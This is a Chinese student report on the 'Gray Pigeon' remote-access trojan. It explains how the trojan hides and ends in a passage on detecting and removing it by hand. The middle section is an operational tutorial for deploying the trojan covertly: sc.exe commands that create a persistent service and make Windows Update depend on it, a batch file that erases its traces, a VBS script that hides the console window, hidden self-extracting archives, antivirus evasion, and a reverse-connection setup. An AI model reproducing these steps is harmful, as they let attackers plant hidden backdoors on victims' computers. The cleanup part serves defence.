关于灰鸽子的原理以及制作和清理.doc

图1 “灰鸽子”攻击原理以及制作和清理院 别计算机科学与通信工程学院专 业计算机科学与技术班级学号4090511姓 名唐盼指导教师曲荣欣成 绩 2012年 6 月 7 日 “灰鸽子”攻击原理以及制作和清理一.灰鸽子简介:“灰鸽子”是一种远程控制软件. 最早出现的时候是在模仿前辈“冰河”。“灰鸽子”在2001年出现的，采用Delphi编写，最早并未以成品方式发布，更多的是以技术研究的姿态，采用了源码共享的方式出现在互联网，导致”灰鸽子”迅速发展起来.并且出现了多种不同的版本. “灰鸽子”在出现的时候使用了当时讨论最多的“反弹端口”连接方式，用以躲避大多数个人网络防火墙的拦截。由于服务端都以隐藏方式启动，就奠定了其恶意后门木马的地位.而我个人就是高中时候,在”灰鸽子”最盛行和风靡的时候,开始认识”灰鸽子”和关注网络安全这个话题.这也是我最早认识和接触到一种黑客软件.在伴随着”灰鸽子”的盛行发展的同时,自己的对网络互联网安全问题的兴趣也随着同步提高.在有关黑客攻击和防范领域过程中享受这种成就感.但是对于”灰鸽子”的了解大多都是来自于,这些杂志.没有深入了学习.但是”灰鸽子”这个概念却深入脑海.一直伴随我成长到如今.如今虽然”灰鸽子”已经不再流行,但是这个在我心底有着深刻影响的软件,已然成了一个黑客软件的代名词.二,灰鸽子基本原理:“灰鸽子”客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服务端程序。可配置的信息主要包括上线类型（如等待连接还是主动连接）、主动连接时使用的公网IP（域名）、连接密码、使用的端口、启动项名称、服务名称，进程隐藏方式，使用的壳，代理，图标等等。 客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事，灰鸽子就成了很强大的黑客工具。 服务端配置出来的服务端文件文件名为G_Server.exe（这是默认的，当然也可以改变）。然后黑客利用一切办法诱骗用户运行G_Server.exe程序。 G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录，2k/NT下为系统盘的Winnt目录,不支持win7系统.在win7做实验没有成功.生成的服务端不能在win7环境下运行).然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端， G_Server_Hook.dll负责隐藏灰鸽子。通过截获进程的API调用隐藏灰鸽子的文件、服务的注册表项，甚至是进程中的模块名。截获的函数主要是用来遍历文件、遍历注册表项和遍历进程模块的一些函数。所以，有些时候用户感觉中了毒，但仔细检查却又发现不了什么异常。有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。注意，G_Server.exe这个名称并不固定，它是可以定制的，比如当定制服务端文件名为A.exe时，生成的文件就是A.exe、A.dll和A_Hook.dll。 Windows目录下的G_Server.exe文件将自己注册成服务（9X系统写注册表启动项），每次开机都能自动运行，运行后启动G_Server.dll和G_Server_Hook.dll并自动退出。G_Server.dll文件实现后门功能，与控制端客户端进行通信；G_Server_Hook.dll则通过拦截API调用来隐藏病毒。因此，中毒后，我们看不到病毒文件，也看不到病毒注册的服务项。随着灰鸽子服务端文件的设置不同，G_Server_Hook.dll有时候附在Explorer.exe的进程空间中，有时候则是附在所有进程中。三;灰鸽子制作实例步骤:准备工具： 灰鸽子服务端; IcoSprite图标更改器；SC.exe服务添加删除更改工具； winrar压缩软件用于捆绑生成的程序.制作过程： 1. 首先自己配置一下鸽子服务端，配置时启动项设置这里面的都不要填，不要写入注册表，也不要用服务启动。 2.用SC创建一个服务 运行CMD.EXE 在system32的目录下运行执行 SC.exe create huigezi BinPath= %systemroot%system32gezi.exe type=own type= interact start= auto DisplayName= gezi.这句是用SC建立一个服务，服务名为huigezi，路径Binpath为%systemroot%system32gezi.exe，类型type为 own 与interact交互，启动类型start为自动，显示名DisplayName为gezi。sc.exe descript_ion huigezi 不死鸽子这句是将huigezi服务的描改为“不死鸽子” sc config wuauserv depend= huigezi配置huigezi使wuauserv服务依存此服务（wuauserv可以根据自己喜欢改成其它服务，这里的wuauserv是系统在Windows Update网站的自动更新服务）。这里的目的是迷惑别人，使其不敢轻易停止我们生成的服务。3.将这些从注册表导出， 我们将他命名为1.reg4.创建一个BAT文件,并命名为update.bat regedit /s %systemroot%system321.reg%systemroot%system32gezi.exedel /q /f /s %systemroot%system321.regdel /q /f /s %systemroot%system32Update.vbsdel /q /f /s %systemroot%system32Update.bat 5.创建一个vbs并命名为update.vbs 目的是为了作用是令bat里的内容以安静模式执行，这样就可以让cmd窗口跳出来了，增加了不少隐蔽性.代码如下：On Error Resume Nextset wshshell=createobject (wscript_.shell)a=wshshell.run (cmd.exe /C %systemroot%system32Update.bat, 0, TRUE)6.用我门配置出来的服务端，并命名为run.exe，用run.exe做一个自解压文件，并命名为gezi.exe.。将解压模式为全部隐藏.解压后运行run.exe，服务端做免杀7.将gezi.exe , 1.reg, Update.vbs, Update.bat 再用winrar制作一个自解压文件，解压到%systemroot%system32 解压后运行Update.vbs当然解压模式依旧全部隐藏，替换同名文件.客户端控制的准备工作:1, 当然是下载灰鸽子的软件2. 申请一个免费的主页空间，因为灰鸽子是可以反弹式链接的，也就是说，服务端通过登陆你的主页的特定文件就可以主动连接到你的电脑让你控制了。3. 首先在电脑上新建一个ip.txt的文本文件，内容如下：http:/huigezi 12:8000end其中12这个是我的电脑目前的IP地址，8000是连接的端口，然后把这个文件上传到你申请的空间,它的目的是客户端上线的话就会去这个网站读取这个文件，然后主动和我取得连接。然后运行 sunray.exe，在后然后运行 http.exe 点开始服务！最后，运行客户端，也就是H_Client.exe这个文件. 点击“自动上线”选项.四:清理灰鸽子一.灰鸽子的手工检测由于灰鸽子拦截了API调用，在正常模式下服务端程序文件和它注册的服务项均被隐藏，也就是说你即使设置了“显示所有隐藏文件”也看不到它们。此外，灰鸽子服务端的文件名也是可以自定义的，这都给手工检测带来了一定的困难。但是灰鸽子的检测仍然是有规律可循的。从上面的运行原理分析可以看出，无论自定义的服务器端文件名是什么，一般都会在操作系统的安装目录下生成一个以“_hook.dll”结尾的文件。通过这一点，我们可以较为准确手工检测出灰鸽子 服务端。由于正常模式下灰鸽子会隐藏自身，因此检测灰鸽子的操作一定要在安全模式下进行。进入安全模式的方法是：启动计算机，在系统进入Windows启动画面前，按下F8键(或者在启动计算机时按住Ctrl键不放)，在出现的启动选项菜单中，选择“Safe Mode”或“安全模式”。1、由于灰鸽子的文件本身具有隐藏属性，因此要设置Windows显示所有文件。打开“我的电脑”，选择菜单“工具”“文件夹选项”，点击“查看”，取消“隐藏受保护的操作系统文件”前的对勾，并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”，然后点击“确定”。2、打开Windows的“搜索文件”，文件名称输入“_hook.dll”，搜索位置选择Windows的安装目录（默认98/xp为C:windows，2k/NT为C:Winnt）。 3、经过搜索，我们在Windows目录（不包含子目录）下发现了一个名为Game_Hook.dll的文件。4、根据灰鸽子原理分析我们知道，如果Game_Hook.DLL是灰鸽子的文件，则在操作系统安装目录下还会有Game.exe和Game.dll文件。打开Windows目录，果然有这两个文件，同时还有一个用于记录键盘操作的GameKey.dll文件。经过这几步操作我们基本就可以确定这些文件是灰鸽子 服务端了，下面就可以进行手动清除。二、灰鸽子的手工清除经过上面的分析，清除灰鸽子就很容易了。清除灰鸽子仍然要在安全模式下操作，主要有两步：1、清除灰鸽子的服务；2删除灰鸽子程序文件。但是为了防止误操作，清除前做好备份。（一）、清除灰鸽子的服务注意清除灰鸽子的服务一定要在注册表里完成，清除灰鸽子的服务一定要先备份注册表，或者到纯DOS下将注册表文件更名，然后在去注册表删除灰鸽子的服务。因为病毒会和EXE文件进行关联2000XP系统：1、打开注册表编辑器（点击“开始”“运行”，输入“Regedit.exe”，确定。），打开HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices注册表项。2、点击菜单“编辑”“查找”，“查找目标”输入“game.exe”，点击确定，我们就可以找到灰鸽子的服务项（此例为Game_Server，每个人这个服务项名称是不同的）。3、删除整个Game_Server项。98me系统：在9X下，灰鸽子启动项只有一个，因此清除更为简单。运行注册表编辑器，打开HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun项，我们立即看到名为Game.exe的一项，将Game.exe项删除即可。（二）、删除灰鸽子程序文件删除灰鸽子程序文件非常简单，只需要在安全模式下删除Windows目录下的Game.exe、Game.dll、Game_Hook.dll以及Gamekey.dll文件，然后重新启动计算机。至此，灰鸽子VIP 2005 服务端已经被清除干净。以上介绍的方法适用于看到的大部分灰鸽子木马及其变种，然而仍有极少数变种采用此种方法无法检测和清除。同时，随着灰鸽子新版本的不断推出，可能会加入一些新的隐藏方法、防删除手段，手工检测和清除它的难